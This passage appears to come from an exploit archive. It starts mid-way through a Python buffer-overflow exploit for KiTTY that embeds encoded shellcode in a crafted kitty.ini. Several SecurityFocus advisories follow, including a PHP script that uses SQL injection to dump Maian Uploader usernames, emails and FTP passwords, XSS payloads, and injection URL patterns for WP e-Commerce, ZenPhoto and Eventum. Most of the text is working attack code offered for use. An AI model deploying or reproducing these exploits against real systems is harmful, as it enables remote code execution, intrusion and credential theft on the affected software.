"\x4d\x67\x71\x58\x47\x75\x68\x6b\x50\x72\x55\x68\x76\x74\x43"
"\x43\x4d\x6c\x38\x45\x6b\x73\x4d\x61\x34\x44\x35\x4d\x34\x51"
"\x48\x4e\x6b\x71\x48\x34\x64\x76\x61\x39\x43\x35\x36\x4e\x6b"
"\x74\x4c\x62\x6b\x4e\x6b\x50\x58\x67\x6c\x47\x71\x4b\x63\x6e"
"\x6b\x65\x54\x6c\x4b\x76\x61\x38\x50\x4c\x49\x37\x34\x75\x74"
"\x37\x54\x73\x6b\x63\x6b\x71\x71\x53\x69\x52\x7a\x43\x61\x79"
"\x6f\x59\x70\x51\x4f\x61\x4f\x32\x7a\x4c\x4b\x42\x32\x58\x6b"
"\x4e\x6d\x61\x4d\x43\x5a\x36\x61\x6c\x4d\x4d\x55\x6c\x72\x47"
"\x70\x67\x70\x77\x70\x42\x70\x32\x48\x45\x61\x4e\x6b\x70\x6f"
"\x6e\x67\x4b\x4f\x59\x45\x4f\x4b\x4a\x50\x6e\x55\x39\x32\x30"
"\x56\x30\x68\x4c\x66\x4c\x55\x6f\x4d\x4d\x4d\x49\x6f\x4e\x35"
"\x55\x6c\x74\x46\x33\x4c\x64\x4a\x6b\x30\x6b\x4b\x4d\x30\x42"
"\x55\x47\x75\x6f\x4b\x70\x47\x67\x63\x30\x72\x30\x6f\x53\x5a"
"\x43\x30\x63\x63\x4b\x4f\x38\x55\x32\x43\x61\x71\x50\x6c\x42"
"\x43\x34\x6e\x33\x55\x44\x38\x43\x55\x33\x30\x41\x41"
)

# Stack address where to copy our shellcode, with an offset of ESP - 1052
if os == "win8.1":
	edi 	= '\xD4\xC0\x28' # 0x0028C0D4 WIN8.1 Pro x64
elif os == "win10":
	edi 	= '\xD4\xC0\x29' # 0x0029C0D4 WIN10 Pro x64
else:
	print "Unknown OS chosen. Please choose 'win8.1' or 'win10'."
	sys.exit()

nops	= '\x90' * 8
padding = '\x41' * (1048 - len(nops) - len(shellcode))

payload = nops + shellcode + padding + edi

# Kitty.ini configuration file
buffer ="[ConfigBox]\n"
buffer +="height=22\n"
buffer +="filter=yes\n"
buffer +="#default=yes\n"
buffer +="#noexit=no\n"
buffer +="[KiTTY]\n"
buffer +="backgroundimage=no\n"
buffer +="capslock=no\n"
buffer +="conf=yes\n"
buffer +="cygterm=yes\n"
buffer +="icon=no\n"
buffer +="#iconfile=\n"
buffer +="#numberoficons=45\n"
buffer +="paste=no\n"
buffer +="print=yes\n"
buffer +="scriptfilefilter=\n"
buffer +="size=no\n"
buffer +="shortcuts=yes\n"
buffer +="mouseshortcuts=yes\n"
buffer +="hyperlink=no\n"
buffer +="transparency=no\n"
buffer +="#configdir=\n"
buffer +="#downloaddir=\n"
buffer +="#uploaddir=\n"
buffer +="remotedir=\n"
buffer +="#PSCPPath=\n"
buffer +="#PlinkPath=\n"
buffer +="#WinSCPPath=\n"
buffer +="#CtHelperPath=\n"
buffer +="#antiidle== \k08\\\n"
buffer +="#antiidledelay=60\n"
buffer +="sshversion=\n"
buffer +="#WinSCPProtocol=sftp\n"
buffer +="#autostoresshkey=no\n"
buffer +="#UserPassSSHNoSave=no\n"
buffer +="KiClassName=" + payload + "\n"
buffer +="#ReconnectDelay=5\n"
buffer +="savemode=dir\n"
buffer +="bcdelay=0\n"
buffer +="commanddelay=5\n"
buffer +="initdelay=2.0\n"
buffer +="internaldelay=10\n"
buffer +="slidedelay=0\n"
buffer +="wintitle=yes\n"
buffer +="zmodem=yes\n"
buffer +="[Print]\n"
buffer +="height=100\n"
buffer +="maxline=60\n"
buffer +="maxchar=85\n"
buffer +="[Folder]\n"
buffer +="[Launcher]\n"
buffer +="reload=yes\n"
buffer +="[Shortcuts]\n"
buffer +="print={SHIFT}{F7}\n"
buffer +="printall={F7}\n"

# Kitty.ini file location (modify according to your installation path)
file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
try:
	print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
	f = open(file,'w')
	f.write(buffer)
	f.close()
	print "[*] Done!"
except:
    print "[-] Error writing %s" % file
            
source: https://www.securityfocus.com/bid/65137/info

Maian Uploader is prone to multiple security vulnerabilities, including:

1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities

Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Maian Uploader 4.0 is vulnerable; other versions may also be affected. 

+] Exploit (1) ' SQL Injection ' =>
#
# <?php
#
# /*
#
# - move.php (lines: 90 > 92 )
# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members 
# WHERE id != '".$_POST['id']."' 
# ORDER BY accname") or die(mysql_error());
#
# */
#
# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members";
#
# $ch = curl_init();
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php");
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
# curl_setopt($ch, CURLOPT_POST, 1);
# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli");
# $exploit = curl_exec ($ch);
# curl_close($ch);
# unset($ch);
# echo $exploit;
# ?>
# 
####
#
# [+] Exploit (2) ' XSRF/XSS ' =>
#
# - load_flv.js.php ( line : 25 ) 
# document.write('<object type="application/x-shockwave-flash" .....
# width="<?php echo $_GET['width']; ?>" 
# height="<?php echo $_GET['height']; ?>
#
# XSS : "><h1>XsS by KedAns-Dz</h1>
# XSS : "><script>Alert('XsS by KedAns-Dz');</script>
#
# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ]
# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ]
#
# [&] Exploit (3) ' Full Path Disclosure ' => 
#
# don't put ( &height= ) after width Xss and you get error 
# Notice about ( Undefined index: height ) with the Full Path Dir.
#
######################################################################
            
source: https://www.securityfocus.com/bid/65130/info

The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including:

1. Multiple remote code-execution vulnerabilities.
2. A local file-include vulnerability
3. An arbitrary file-upload vulnerability

An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, upload arbitrary files to the affected computer that may result in arbitrary code execution within the context of the vulnerable application.

WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected. 

Local file-include
http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]

Remote code-execution
http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD] 
            
source: https://www.securityfocus.com/bid/65126/info

ZenPhoto is prone to an SQL-injection vulnerability and multiple path-disclosure vulnerabilities.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker may gain access to potentially sensitive information that can aid in other attacks.

ZenPhoto 1.4.4 is vulnerable; other versions may also be affected. 

http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection] 
            
source: https://www.securityfocus.com/bid/65186/info

Eventum is prone to an insecure file-permission vulnerability.

An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks.

Eventum 2.3.4 is vulnerable; other versions may also be affected. 

Following example URI is available.

http://www.example.com/setup/index.php